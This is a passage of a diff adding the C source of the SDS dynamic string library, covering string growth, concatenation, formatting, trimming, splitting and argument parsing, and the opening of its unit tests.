+ * so that next append operations will not require allocations up to the
+ * number of bytes previously available. */
+void sdsclear(sds s) {
+    sdssetlen(s, 0);
+    s[0] = '\0';
+}
+
+/* Enlarge the free space at the end of the sds string so that the caller
+ * is sure that after calling this function can overwrite up to addlen
+ * bytes after the end of the string, plus one more byte for nul term.
+ *
+ * Note: this does not change the *length* of the sds string as returned
+ * by sdslen(), but only the free buffer space we have. */
+sds sdsMakeRoomFor(sds s, size_t addlen) {
+    void *sh, *newsh;
+    size_t avail = sdsavail(s);
+    size_t len, newlen;
+    char type, oldtype = s[-1] & SDS_TYPE_MASK;
+    int hdrlen;
+
+    /* Return ASAP if there is enough space left. */
+    if (avail >= addlen) return s;
+
+    len = sdslen(s);
+    sh = (char*)s-sdsHdrSize(oldtype);
+    newlen = (len+addlen);
+    if (newlen < SDS_MAX_PREALLOC)
+        newlen *= 2;
+    else
+        newlen += SDS_MAX_PREALLOC;
+
+    type = sdsReqType(newlen);
+
+    /* Don't use type 5: the user is appending to the string and type 5 is
+     * not able to remember empty space, so sdsMakeRoomFor() must be called
+     * at every appending operation. */
+    if (type == SDS_TYPE_5) type = SDS_TYPE_8;
+
+    hdrlen = sdsHdrSize(type);
+    if (oldtype==type) {
+        newsh = s_realloc(sh, hdrlen+newlen+1);
+        if (newsh == NULL) return NULL;
+        s = (char*)newsh+hdrlen;
+    } else {
+        /* Since the header size changes, need to move the string forward,
+         * and can't use realloc */
+        newsh = s_malloc(hdrlen+newlen+1);
+        if (newsh == NULL) return NULL;
+        memcpy((char*)newsh+hdrlen, s, len+1);
+        s_free(sh);
+        s = (char*)newsh+hdrlen;
+        s[-1] = type;
+        sdssetlen(s, len);
+    }
+    sdssetalloc(s, newlen);
+    return s;
+}
+
+/* Reallocate the sds string so that it has no free space at the end. The
+ * contained string remains not altered, but next concatenation operations
+ * will require a reallocation.
+ *
+ * After the call, the passed sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call. */
+sds sdsRemoveFreeSpace(sds s) {
+    void *sh, *newsh;
+    char type, oldtype = s[-1] & SDS_TYPE_MASK;
+    int hdrlen;
+    size_t len = sdslen(s);
+    sh = (char*)s-sdsHdrSize(oldtype);
+
+    type = sdsReqType(len);
+    hdrlen = sdsHdrSize(type);
+    if (oldtype==type) {
+        newsh = s_realloc(sh, hdrlen+len+1);
+        if (newsh == NULL) return NULL;
+        s = (char*)newsh+hdrlen;
+    } else {
+        newsh = s_malloc(hdrlen+len+1);
+        if (newsh == NULL) return NULL;
+        memcpy((char*)newsh+hdrlen, s, len+1);
+        s_free(sh);
+        s = (char*)newsh+hdrlen;
+        s[-1] = type;
+        sdssetlen(s, len);
+    }
+    sdssetalloc(s, len);
+    return s;
+}
+
+/* Return the total size of the allocation of the specifed sds string,
+ * including:
+ * 1) The sds header before the pointer.
+ * 2) The string.
+ * 3) The free buffer at the end if any.
+ * 4) The implicit null term.
+ */
+size_t sdsAllocSize(sds s) {
+    size_t alloc = sdsalloc(s);
+    return sdsHdrSize(s[-1])+alloc+1;
+}
+
+/* Return the pointer of the actual SDS allocation (normally SDS strings
+ * are referenced by the start of the string buffer). */
+void *sdsAllocPtr(sds s) {
+    return (void*) (s-sdsHdrSize(s[-1]));
+}
+
+/* Increment the sds length and decrements the left free space at the
+ * end of the string according to 'incr'. Also set the null term
+ * in the new end of the string.
+ *
+ * This function is used in order to fix the string length after the
+ * user calls sdsMakeRoomFor(), writes something after the end of
+ * the current string, and finally needs to set the new length.
+ *
+ * Note: it is possible to use a negative increment in order to
+ * right-trim the string.
+ *
+ * Usage example:
+ *
+ * Using sdsIncrLen() and sdsMakeRoomFor() it is possible to mount the
+ * following schema, to cat bytes coming from the kernel to the end of an
+ * sds string without copying into an intermediate buffer:
+ *
+ * oldlen = sdslen(s);
+ * s = sdsMakeRoomFor(s, BUFFER_SIZE);
+ * nread = read(fd, s+oldlen, BUFFER_SIZE);
+ * ... check for nread <= 0 and handle it ...
+ * sdsIncrLen(s, nread);
+ */
+void sdsIncrLen(sds s, int incr) {
+    unsigned char flags = s[-1];
+    size_t len;
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5: {
+            unsigned char *fp = ((unsigned char*)s)-1;
+            unsigned char oldlen = SDS_TYPE_5_LEN(flags);
+            assert((incr > 0 && oldlen+incr < 32) || (incr < 0 && oldlen >= (unsigned int)(-incr)));
+            *fp = SDS_TYPE_5 | ((oldlen+incr) << SDS_TYPE_BITS);
+            len = oldlen+incr;
+            break;
+        }
+        case SDS_TYPE_8: {
+            SDS_HDR_VAR(8,s);
+            assert((incr >= 0 && sh->alloc-sh->len >= incr) || (incr < 0 && sh->len >= (unsigned int)(-incr)));
+            len = (sh->len += incr);
+            break;
+        }
+        case SDS_TYPE_16: {
+            SDS_HDR_VAR(16,s);
+            assert((incr >= 0 && sh->alloc-sh->len >= incr) || (incr < 0 && sh->len >= (unsigned int)(-incr)));
+            len = (sh->len += incr);
+            break;
+        }
+        case SDS_TYPE_32: {
+            SDS_HDR_VAR(32,s);
+            assert((incr >= 0 && sh->alloc-sh->len >= (unsigned int)incr) || (incr < 0 && sh->len >= (unsigned int)(-incr)));
+            len = (sh->len += incr);
+            break;
+        }
+        case SDS_TYPE_64: {
+            SDS_HDR_VAR(64,s);
+            assert((incr >= 0 && sh->alloc-sh->len >= (uint64_t)incr) || (incr < 0 && sh->len >= (uint64_t)(-incr)));
+            len = (sh->len += incr);
+            break;
+        }
+        default: len = 0; /* Just to avoid compilation warnings. */
+    }
+    s[len] = '\0';
+}
+
+/* Grow the sds to have the specified length. Bytes that were not part of
+ * the original length of the sds will be set to zero.
+ *
+ * if the specified length is smaller than the current length, no operation
+ * is performed. */
+sds sdsgrowzero(sds s, size_t len) {
+    size_t curlen = sdslen(s);
+
+    if (len <= curlen) return s;
+    s = sdsMakeRoomFor(s,len-curlen);
+    if (s == NULL) return NULL;
+
+    /* Make sure added region doesn't contain garbage */
+    memset(s+curlen,0,(len-curlen+1)); /* also set trailing \0 byte */
+    sdssetlen(s, len);
+    return s;
+}
+
+/* Append the specified binary-safe string pointed by 't' of 'len' bytes to the
+ * end of the specified sds string 's'.
+ *
+ * After the call, the passed sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call. */
+sds sdscatlen(sds s, const void *t, size_t len) {
+    size_t curlen = sdslen(s);
+
+    s = sdsMakeRoomFor(s,len);
+    if (s == NULL) return NULL;
+    memcpy(s+curlen, t, len);
+    sdssetlen(s, curlen+len);
+    s[curlen+len] = '\0';
+    return s;
+}
+
+/* Append the specified null termianted C string to the sds string 's'.
+ *
+ * After the call, the passed sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call. */
+sds sdscat(sds s, const char *t) {
+    return sdscatlen(s, t, strlen(t));
+}
+
+/* Append the specified sds 't' to the existing sds 's'.
+ *
+ * After the call, the modified sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call. */
+sds sdscatsds(sds s, const sds t) {
+    return sdscatlen(s, t, sdslen(t));
+}
+
+/* Destructively modify the sds string 's' to hold the specified binary
+ * safe string pointed by 't' of length 'len' bytes. */
+sds sdscpylen(sds s, const char *t, size_t len) {
+    if (sdsalloc(s) < len) {
+        s = sdsMakeRoomFor(s,len-sdslen(s));
+        if (s == NULL) return NULL;
+    }
+    memcpy(s, t, len);
+    s[len] = '\0';
+    sdssetlen(s, len);
+    return s;
+}
+
+/* Like sdscpylen() but 't' must be a null-termined string so that the length
+ * of the string is obtained with strlen(). */
+sds sdscpy(sds s, const char *t) {
+    return sdscpylen(s, t, strlen(t));
+}
+
+/* Helper for sdscatlonglong() doing the actual number -> string
+ * conversion. 's' must point to a string with room for at least
+ * SDS_LLSTR_SIZE bytes.
+ *
+ * The function returns the length of the null-terminated string
+ * representation stored at 's'. */
+#define SDS_LLSTR_SIZE 21
+int sdsll2str(char *s, long long value) {
+    char *p, aux;
+    unsigned long long v;
+    size_t l;
+
+    /* Generate the string representation, this method produces
+     * an reversed string. */
+    v = (value < 0) ? -value : value;
+    p = s;
+    do {
+        *p++ = '0'+(v%10);
+        v /= 10;
+    } while(v);
+    if (value < 0) *p++ = '-';
+
+    /* Compute length and add null term. */
+    l = p-s;
+    *p = '\0';
+
+    /* Reverse the string. */
+    p--;
+    while(s < p) {
+        aux = *s;
+        *s = *p;
+        *p = aux;
+        s++;
+        p--;
+    }
+    return l;
+}
+
+/* Identical sdsll2str(), but for unsigned long long type. */
+int sdsull2str(char *s, unsigned long long v) {
+    char *p, aux;
+    size_t l;
+
+    /* Generate the string representation, this method produces
+     * an reversed string. */
+    p = s;
+    do {
+        *p++ = '0'+(v%10);
+        v /= 10;
+    } while(v);
+
+    /* Compute length and add null term. */
+    l = p-s;
+    *p = '\0';
+
+    /* Reverse the string. */
+    p--;
+    while(s < p) {
+        aux = *s;
+        *s = *p;
+        *p = aux;
+        s++;
+        p--;
+    }
+    return l;
+}
+
+/* Create an sds string from a long long value. It is much faster than:
+ *
+ * sdscatprintf(sdsempty(),"%lld\n", value);
+ */
+sds sdsfromlonglong(long long value) {
+    char buf[SDS_LLSTR_SIZE];
+    int len = sdsll2str(buf,value);
+
+    return sdsnewlen(buf,len);
+}
+
+/* Like sdscatprintf() but gets va_list instead of being variadic. */
+sds sdscatvprintf(sds s, const char *fmt, va_list ap) {
+    va_list cpy;
+    char staticbuf[1024], *buf = staticbuf, *t;
+    size_t buflen = strlen(fmt)*2;
+
+    /* We try to start using a static buffer for speed.
+     * If not possible we revert to heap allocation. */
+    if (buflen > sizeof(staticbuf)) {
+        buf = s_malloc(buflen);
+        if (buf == NULL) return NULL;
+    } else {
+        buflen = sizeof(staticbuf);
+    }
+
+    /* Try with buffers two times bigger every time we fail to
+     * fit the string in the current buffer size. */
+    while(1) {
+        buf[buflen-2] = '\0';
+        va_copy(cpy,ap);
+        vsnprintf(buf, buflen, fmt, cpy);
+        va_end(cpy);
+        if (buf[buflen-2] != '\0') {
+            if (buf != staticbuf) s_free(buf);
+            buflen *= 2;
+            buf = s_malloc(buflen);
+            if (buf == NULL) return NULL;
+            continue;
+        }
+        break;
+    }
+
+    /* Finally concat the obtained string to the SDS string and return it. */
+    t = sdscat(s, buf);
+    if (buf != staticbuf) s_free(buf);
+    return t;
+}
+
+/* Append to the sds string 's' a string obtained using printf-alike format
+ * specifier.
+ *
+ * After the call, the modified sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call.
+ *
+ * Example:
+ *
+ * s = sdsnew("Sum is: ");
+ * s = sdscatprintf(s,"%d+%d = %d",a,b,a+b).
+ *
+ * Often you need to create a string from scratch with the printf-alike
+ * format. When this is the need, just use sdsempty() as the target string:
+ *
+ * s = sdscatprintf(sdsempty(), "... your format ...", args);
+ */
+sds sdscatprintf(sds s, const char *fmt, ...) {
+    va_list ap;
+    char *t;
+    va_start(ap, fmt);
+    t = sdscatvprintf(s,fmt,ap);
+    va_end(ap);
+    return t;
+}
+
+/* This function is similar to sdscatprintf, but much faster as it does
+ * not rely on sprintf() family functions implemented by the libc that
+ * are often very slow. Moreover directly handling the sds string as
+ * new data is concatenated provides a performance improvement.
+ *
+ * However this function only handles an incompatible subset of printf-alike
+ * format specifiers:
+ *
+ * %s - C String
+ * %S - SDS string
+ * %i - signed int
+ * %I - 64 bit signed integer (long long, int64_t)
+ * %u - unsigned int
+ * %U - 64 bit unsigned integer (unsigned long long, uint64_t)
+ * %% - Verbatim "%" character.
+ */
+sds sdscatfmt(sds s, char const *fmt, ...) {
+    size_t initlen = sdslen(s);
+    const char *f = fmt;
+    int i;
+    va_list ap;
+
+    va_start(ap,fmt);
+    f = fmt;    /* Next format specifier byte to process. */
+    i = initlen; /* Position of the next byte to write to dest str. */
+    while(*f) {
+        char next, *str;
+        size_t l;
+        long long num;
+        unsigned long long unum;
+
+        /* Make sure there is always space for at least 1 char. */
+        if (sdsavail(s)==0) {
+            s = sdsMakeRoomFor(s,1);
+        }
+
+        switch(*f) {
+        case '%':
+            next = *(f+1);
+            f++;
+            switch(next) {
+            case 's':
+            case 'S':
+                str = va_arg(ap,char*);
+                l = (next == 's') ? strlen(str) : sdslen(str);
+                if (sdsavail(s) < l) {
+                    s = sdsMakeRoomFor(s,l);
+                }
+                memcpy(s+i,str,l);
+                sdsinclen(s,l);
+                i += l;
+                break;
+            case 'i':
+            case 'I':
+                if (next == 'i')
+                    num = va_arg(ap,int);
+                else
+                    num = va_arg(ap,long long);
+                {
+                    char buf[SDS_LLSTR_SIZE];
+                    l = sdsll2str(buf,num);
+                    if (sdsavail(s) < l) {
+                        s = sdsMakeRoomFor(s,l);
+                    }
+                    memcpy(s+i,buf,l);
+                    sdsinclen(s,l);
+                    i += l;
+                }
+                break;
+            case 'u':
+            case 'U':
+                if (next == 'u')
+                    unum = va_arg(ap,unsigned int);
+                else
+                    unum = va_arg(ap,unsigned long long);
+                {
+                    char buf[SDS_LLSTR_SIZE];
+                    l = sdsull2str(buf,unum);
+                    if (sdsavail(s) < l) {
+                        s = sdsMakeRoomFor(s,l);
+                    }
+                    memcpy(s+i,buf,l);
+                    sdsinclen(s,l);
+                    i += l;
+                }
+                break;
+            default: /* Handle %% and generally %<unknown>. */
+                s[i++] = next;
+                sdsinclen(s,1);
+                break;
+            }
+            break;
+        default:
+            s[i++] = *f;
+            sdsinclen(s,1);
+            break;
+        }
+        f++;
+    }
+    va_end(ap);
+
+    /* Add null-term */
+    s[i] = '\0';
+    return s;
+}
+
+/* Remove the part of the string from left and from right composed just of
+ * contiguous characters found in 'cset', that is a null terminted C string.
+ *
+ * After the call, the modified sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call.
+ *
+ * Example:
+ *
+ * s = sdsnew("AA...AA.a.aa.aHelloWorld     :::");
+ * s = sdstrim(s,"Aa. :");
+ * printf("%s\n", s);
+ *
+ * Output will be just "Hello World".
+ */
+sds sdstrim(sds s, const char *cset) {
+    char *start, *end, *sp, *ep;
+    size_t len;
+
+    sp = start = s;
+    ep = end = s+sdslen(s)-1;
+    while(sp <= end && strchr(cset, *sp)) sp++;
+    while(ep > sp && strchr(cset, *ep)) ep--;
+    len = (sp > ep) ? 0 : ((ep-sp)+1);
+    if (s != sp) memmove(s, sp, len);
+    s[len] = '\0';
+    sdssetlen(s,len);
+    return s;
+}
+
+/* Turn the string into a smaller (or equal) string containing only the
+ * substring specified by the 'start' and 'end' indexes.
+ *
+ * start and end can be negative, where -1 means the last character of the
+ * string, -2 the penultimate character, and so forth.
+ *
+ * The interval is inclusive, so the start and end characters will be part
+ * of the resulting string.
+ *
+ * The string is modified in-place.
+ *
+ * Example:
+ *
+ * s = sdsnew("Hello World");
+ * sdsrange(s,1,-1); => "ello World"
+ */
+void sdsrange(sds s, int start, int end) {
+    size_t newlen, len = sdslen(s);
+
+    if (len == 0) return;
+    if (start < 0) {
+        start = len+start;
+        if (start < 0) start = 0;
+    }
+    if (end < 0) {
+        end = len+end;
+        if (end < 0) end = 0;
+    }
+    newlen = (start > end) ? 0 : (end-start)+1;
+    if (newlen != 0) {
+        if (start >= (signed)len) {
+            newlen = 0;
+        } else if (end >= (signed)len) {
+            end = len-1;
+            newlen = (start > end) ? 0 : (end-start)+1;
+        }
+    } else {
+        start = 0;
+    }
+    if (start && newlen) memmove(s, s+start, newlen);
+    s[newlen] = 0;
+    sdssetlen(s,newlen);
+}
+
+/* Apply tolower() to every character of the sds string 's'. */
+void sdstolower(sds s) {
+    int len = sdslen(s), j;
+
+    for (j = 0; j < len; j++) s[j] = tolower(s[j]);
+}
+
+/* Apply toupper() to every character of the sds string 's'. */
+void sdstoupper(sds s) {
+    int len = sdslen(s), j;
+
+    for (j = 0; j < len; j++) s[j] = toupper(s[j]);
+}
+
+/* Compare two sds strings s1 and s2 with memcmp().
+ *
+ * Return value:
+ *
+ *     positive if s1 > s2.
+ *     negative if s1 < s2.
+ *     0 if s1 and s2 are exactly the same binary string.
+ *
+ * If two strings share exactly the same prefix, but one of the two has
+ * additional characters, the longer string is considered to be greater than
+ * the smaller one. */
+int sdscmp(const sds s1, const sds s2) {
+    size_t l1, l2, minlen;
+    int cmp;
+
+    l1 = sdslen(s1);
+    l2 = sdslen(s2);
+    minlen = (l1 < l2) ? l1 : l2;
+    cmp = memcmp(s1,s2,minlen);
+    if (cmp == 0) return l1-l2;
+    return cmp;
+}
+
+/* Split 's' with separator in 'sep'. An array
+ * of sds strings is returned. *count will be set
+ * by reference to the number of tokens returned.
+ *
+ * On out of memory, zero length string, zero length
+ * separator, NULL is returned.
+ *
+ * Note that 'sep' is able to split a string using
+ * a multi-character separator. For example
+ * sdssplit("foo_-_bar","_-_"); will return two
+ * elements "foo" and "bar".
+ *
+ * This version of the function is binary-safe but
+ * requires length arguments. sdssplit() is just the
+ * same function but for zero-terminated strings.
+ */
+sds *sdssplitlen(const char *s, int len, const char *sep, int seplen, int *count) {
+    int elements = 0, slots = 5, start = 0, j;
+    sds *tokens;
+
+    if (seplen < 1 || len < 0) return NULL;
+
+    tokens = s_malloc(sizeof(sds)*slots);
+    if (tokens == NULL) return NULL;
+
+    if (len == 0) {
+        *count = 0;
+        return tokens;
+    }
+    for (j = 0; j < (len-(seplen-1)); j++) {
+        /* make sure there is room for the next element and the final one */
+        if (slots < elements+2) {
+            sds *newtokens;
+
+            slots *= 2;
+            newtokens = s_realloc(tokens,sizeof(sds)*slots);
+            if (newtokens == NULL) goto cleanup;
+            tokens = newtokens;
+        }
+        /* search the separator */
+        if ((seplen == 1 && *(s+j) == sep[0]) || (memcmp(s+j,sep,seplen) == 0)) {
+            tokens[elements] = sdsnewlen(s+start,j-start);
+            if (tokens[elements] == NULL) goto cleanup;
+            elements++;
+            start = j+seplen;
+            j = j+seplen-1; /* skip the separator */
+        }
+    }
+    /* Add the final element. We are sure there is room in the tokens array. */
+    tokens[elements] = sdsnewlen(s+start,len-start);
+    if (tokens[elements] == NULL) goto cleanup;
+    elements++;
+    *count = elements;
+    return tokens;
+
+cleanup:
+    {
+        int i;
+        for (i = 0; i < elements; i++) sdsfree(tokens[i]);
+        s_free(tokens);
+        *count = 0;
+        return NULL;
+    }
+}
+
+/* Free the result returned by sdssplitlen(), or do nothing if 'tokens' is NULL. */
+void sdsfreesplitres(sds *tokens, int count) {
+    if (!tokens) return;
+    while(count--)
+        sdsfree(tokens[count]);
+    s_free(tokens);
+}
+
+/* Append to the sds string "s" an escaped string representation where
+ * all the non-printable characters (tested with isprint()) are turned into
+ * escapes in the form "\n\r\a...." or "\x<hex-number>".
+ *
+ * After the call, the modified sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call. */
+sds sdscatrepr(sds s, const char *p, size_t len) {
+    s = sdscatlen(s,"\"",1);
+    while(len--) {
+        switch(*p) {
+        case '\\':
+        case '"':
+            s = sdscatprintf(s,"\\%c",*p);
+            break;
+        case '\n': s = sdscatlen(s,"\\n",2); break;
+        case '\r': s = sdscatlen(s,"\\r",2); break;
+        case '\t': s = sdscatlen(s,"\\t",2); break;
+        case '\a': s = sdscatlen(s,"\\a",2); break;
+        case '\b': s = sdscatlen(s,"\\b",2); break;
+        default:
+            if (isprint(*p))
+                s = sdscatprintf(s,"%c",*p);
+            else
+                s = sdscatprintf(s,"\\x%02x",(unsigned char)*p);
+            break;
+        }
+        p++;
+    }
+    return sdscatlen(s,"\"",1);
+}
+
+/* Helper function for sdssplitargs() that returns non zero if 'c'
+ * is a valid hex digit. */
+int is_hex_digit(char c) {
+    return (c >= '0' && c <= '9') || (c >= 'a' && c <= 'f') ||
+           (c >= 'A' && c <= 'F');
+}
+
+/* Helper function for sdssplitargs() that converts a hex digit into an
+ * integer from 0 to 15 */
+int hex_digit_to_int(char c) {
+    switch(c) {
+    case '0': return 0;
+    case '1': return 1;
+    case '2': return 2;
+    case '3': return 3;
+    case '4': return 4;
+    case '5': return 5;
+    case '6': return 6;
+    case '7': return 7;
+    case '8': return 8;
+    case '9': return 9;
+    case 'a': case 'A': return 10;
+    case 'b': case 'B': return 11;
+    case 'c': case 'C': return 12;
+    case 'd': case 'D': return 13;
+    case 'e': case 'E': return 14;
+    case 'f': case 'F': return 15;
+    default: return 0;
+    }
+}
+
+/* Split a line into arguments, where every argument can be in the
+ * following programming-language REPL-alike form:
+ *
+ * foo bar "newline are supported\n" and "\xff\x00otherstuff"
+ *
+ * The number of arguments is stored into *argc, and an array
+ * of sds is returned.
+ *
+ * The caller should free the resulting array of sds strings with
+ * sdsfreesplitres().
+ *
+ * Note that sdscatrepr() is able to convert back a string into
+ * a quoted string in the same format sdssplitargs() is able to parse.
+ *
+ * The function returns the allocated tokens on success, even when the
+ * input string is empty, or NULL if the input contains unbalanced
+ * quotes or closed quotes followed by non space characters
+ * as in: "foo"bar or "foo'
+ */
+sds *sdssplitargs(const char *line, int *argc) {
+    const char *p = line;
+    char *current = NULL;
+    char **vector = NULL;
+
+    *argc = 0;
+    while(1) {
+        /* skip blanks */
+        while(*p && isspace(*p)) p++;
+        if (*p) {
+            /* get a token */
+            int inq=0;  /* set to 1 if we are in "quotes" */
+            int insq=0; /* set to 1 if we are in 'single quotes' */
+            int done=0;
+
+            if (current == NULL) current = sdsempty();
+            while(!done) {
+                if (inq) {
+                    if (*p == '\\' && *(p+1) == 'x' &&
+                                             is_hex_digit(*(p+2)) &&
+                                             is_hex_digit(*(p+3)))
+                    {
+                        unsigned char byte;
+
+                        byte = (hex_digit_to_int(*(p+2))*16)+
+                                hex_digit_to_int(*(p+3));
+                        current = sdscatlen(current,(char*)&byte,1);
+                        p += 3;
+                    } else if (*p == '\\' && *(p+1)) {
+                        char c;
+
+                        p++;
+                        switch(*p) {
+                        case 'n': c = '\n'; break;
+                        case 'r': c = '\r'; break;
+                        case 't': c = '\t'; break;
+                        case 'b': c = '\b'; break;
+                        case 'a': c = '\a'; break;
+                        default: c = *p; break;
+                        }
+                        current = sdscatlen(current,&c,1);
+                    } else if (*p == '"') {
+                        /* closing quote must be followed by a space or
+                         * nothing at all. */
+                        if (*(p+1) && !isspace(*(p+1))) goto err;
+                        done=1;
+                    } else if (!*p) {
+                        /* unterminated quotes */
+                        goto err;
+                    } else {
+                        current = sdscatlen(current,p,1);
+                    }
+                } else if (insq) {
+                    if (*p == '\\' && *(p+1) == '\'') {
+                        p++;
+                        current = sdscatlen(current,"'",1);
+                    } else if (*p == '\'') {
+                        /* closing quote must be followed by a space or
+                         * nothing at all. */
+                        if (*(p+1) && !isspace(*(p+1))) goto err;
+                        done=1;
+                    } else if (!*p) {
+                        /* unterminated quotes */
+                        goto err;
+                    } else {
+                        current = sdscatlen(current,p,1);
+                    }
+                } else {
+                    switch(*p) {
+                    case ' ':
+                    case '\n':
+                    case '\r':
+                    case '\t':
+                    case '\0':
+                        done=1;
+                        break;
+                    case '"':
+                        inq=1;
+                        break;
+                    case '\'':
+                        insq=1;
+                        break;
+                    default:
+                        current = sdscatlen(current,p,1);
+                        break;
+                    }
+                }
+                if (*p) p++;
+            }
+            /* add the token to the vector */
+            vector = s_realloc(vector,((*argc)+1)*sizeof(char*));
+            vector[*argc] = current;
+            (*argc)++;
+            current = NULL;
+        } else {
+            /* Even on empty input string return something not NULL. */
+            if (vector == NULL) vector = s_malloc(sizeof(void*));
+            return vector;
+        }
+    }
+
+err:
+    while((*argc)--)
+        sdsfree(vector[*argc]);
+    s_free(vector);
+    if (current) sdsfree(current);
+    *argc = 0;
+    return NULL;
+}
+
+/* Modify the string substituting all the occurrences of the set of
+ * characters specified in the 'from' string to the corresponding character
+ * in the 'to' array.
+ *
+ * For instance: sdsmapchars(mystring, "ho", "01", 2)
+ * will have the effect of turning the string "hello" into "0ell1".
+ *
+ * The function returns the sds string pointer, that is always the same
+ * as the input pointer since no resize is needed. */
+sds sdsmapchars(sds s, const char *from, const char *to, size_t setlen) {
+    size_t j, i, l = sdslen(s);
+
+    for (j = 0; j < l; j++) {
+        for (i = 0; i < setlen; i++) {
+            if (s[j] == from[i]) {
+                s[j] = to[i];
+                break;
+            }
+        }
+    }
+    return s;
+}
+
+/* Join an array of C strings using the specified separator (also a C string).
+ * Returns the result as an sds string. */
+sds sdsjoin(char **argv, int argc, char *sep) {
+    sds join = sdsempty();
+    int j;
+
+    for (j = 0; j < argc; j++) {
+        join = sdscat(join, argv[j]);
+        if (j != argc-1) join = sdscat(join,sep);
+    }
+    return join;
+}
+
+/* Like sdsjoin, but joins an array of SDS strings. */
+sds sdsjoinsds(sds *argv, int argc, const char *sep, size_t seplen) {
+    sds join = sdsempty();
+    int j;
+
+    for (j = 0; j < argc; j++) {
+        join = sdscatsds(join, argv[j]);
+        if (j != argc-1) join = sdscatlen(join,sep,seplen);
+    }
+    return join;
+}
+
+/* Wrappers to the allocators used by SDS. Note that SDS will actually
+ * just use the macros defined into sdsalloc.h in order to avoid to pay
+ * the overhead of function calls. Here we define these wrappers only for
+ * the programs SDS is linked to, if they want to touch the SDS internals
+ * even if they use a different allocator. */
+void *sds_malloc(size_t size) { return s_malloc(size); }
+void *sds_realloc(void *ptr, size_t size) { return s_realloc(ptr,size); }
+void sds_free(void *ptr) { s_free(ptr); }
+
+#if defined(SDS_TEST_MAIN)
+#include <stdio.h>
+#include "testhelp.h"
+#include "limits.h"
+
+#define UNUSED(x) (void)(x)
+int sdsTest(void) {
+    {
+        sds x = sdsnew("foo"), y;
+
+        test_cond("Create a string and obtain the length",
+            sdslen(x) == 3 && memcmp(x,"foo\0",4) == 0)
+
+        sdsfree(x);
+        x = sdsnewlen("foo",2);
+        test_cond("Create a string with specified length",
+            sdslen(x) == 2 && memcmp(x,"fo\0",3) == 0)
+
+        x = sdscat(x,"bar");
+        test_cond("Strings concatenation",
+            sdslen(x) == 5 && memcmp(x,"fobar\0",6) == 0);
+
+        x = sdscpy(x,"a");
+        test_cond("sdscpy() against an originally longer string",
+            sdslen(x) == 1 && memcmp(x,"a\0",2) == 0)
+
+        x = sdscpy(x,"xyzxxxxxxxxxxyyyyyyyyyykkkkkkkkkk");
+        test_cond("sdscpy() against an originally shorter string",
+            sdslen(x) == 33 &&
+            memcmp(x,"xyzxxxxxxxxxxyyyyyyyyyykkkkkkkkkk\0",33) == 0)
+
+        sdsfree(x);
+        x = sdscatprintf(sdsempty(),"%d",123);
+        test_cond("sdscatprintf() seems working in the base case",
+            sdslen(x) == 3 && memcmp(x,"123\0",4) == 0)
+
+        sdsfree(x);
+        x = sdsnew("--");
+        x = sdscatfmt(x, "Hello %s World %I,%I--", "Hi!", LLONG_MIN,LLONG_MAX);
+        test_cond("sdscatfmt() seems working in the base case",
+            sdslen(x) == 60 &&
+            memcmp(x,"--Hello Hi! World -9223372036854775808,"
+                     "9223372036854775807--",60) == 0)
+        printf("[%s]\n",x);
+
+        sdsfree(x);
+        x = sdsnew("--");
+        x = sdscatfmt(x, "%u,%U--", UINT_MAX, ULLONG_MAX);
+        test_cond("sdscatfmt() seems working with unsigned numbers",
+            sdslen(x) == 35 &&
+            memcmp(x,"--4294967295,18446744073709551615--",35) == 0)
+
+        sdsfree(x);
+        x = sdsnew(" x ");
+        sdstrim(x," x");
+        test_cond("sdstrim() works when all chars match",
+            sdslen(x) == 0)
+
+        sdsfree(x);
+        x = sdsnew(" x ");
+        sdstrim(x," ");
+        test_cond("sdstrim() works when a single char remains",
+            sdslen(x) == 1 && x[0] == 'x')
+
+        sdsfree(x);
+        x = sdsnew("xxciaoyyy");
+        sdstrim(x,"xy");
+        test_cond("sdstrim() correctly trims characters",
+            sdslen(x) == 4 && memcmp(x,"ciao\0",5) == 0)
+
+        y = sdsdup(x);
+        sdsrange(y,1,1);
+        test_cond("sdsrange(...,1,1)",
+            sdslen(y) == 1 && memcmp(y,"i\0",2) == 0)
+
+        sdsfree(y);
+        y = sdsdup(x);
+        sdsrange(y,1,-1);
+        test_cond("sdsrange(...,1,-1)",
+            sdslen(y) == 3 && memcmp(y,"iao\0",4) == 0)
+
+        sdsfree(y);
+        y = sdsdup(x);
+        sdsrange(y,-2,-1);
+        test_cond("sdsrange(...,-2,-1)",
+            sdslen(y) == 2 && memcmp(y,"ao\0",3) == 0)
+
+        sdsfree(y);
+        y = sdsdup(x);
+        sdsrange(y,2,1);
+        test_cond("sdsrange(...,2,1)",
+            sdslen(y) == 0 && memcmp(y,"\0",1) == 0)
+
+        sdsfree(y);
+        y = sdsdup(x);
+        sdsrange(y,1,100);
+        test_cond("sdsrange(...,1,100)",
+            sdslen(y) == 3 && memcmp(y,"iao\0",4) == 0)
+
+        sdsfree(y);
+        y = sdsdup(x);
+        sdsrange(y,100,100);
+        test_cond("sdsrange(...,100,100)",
+            sdslen(y) == 0 && memcmp(y,"\0",1) == 0)
+
+        sdsfree(y);
+        sdsfree(x);
+        x = sdsnew("foo");
+        y = sdsnew("foa");
+        test_cond("sdscmp(foo,foa)", sdscmp(x,y) > 0)
+
+        sdsfree(y);
+        sdsfree(x);
+        x = sdsnew("bar");
+        y = sdsnew("bar");
+        test_cond("sdscmp(bar,bar)", sdscmp(x,y) == 0)
+
+        sdsfree(y);
+        sdsfree(x);
+        x = sdsnew("aar");
+        y = sdsnew("bar");
+        test_cond("sdscmp(bar,bar)", sdscmp(x,y) < 0)
+
+        sdsfree(y);
+        sdsfree(x);
+        x = sdsnewlen("\a\n\0foo\r",7);
+        y = sdscatrepr(sdsempty(),x,sdslen(x));
+        test_cond("sdscatrepr(...data...)",
+            memcmp(y,"\"\\a\\n\\x00foo\\r\"",15) == 0)
+
+        {
+            unsigned int oldfree;
+            char *p;
+            int step = 10, j, i;
+
+            sdsfree(x);
+            sdsfree(y);
+            x = sdsnew("0");
+            test_cond("sdsnew() free/len buffers", sdslen(x) == 1 && sdsavail(x) == 0);
+
+            /* Run the test a few times in order to hit the first two
+             * SDS header types. */
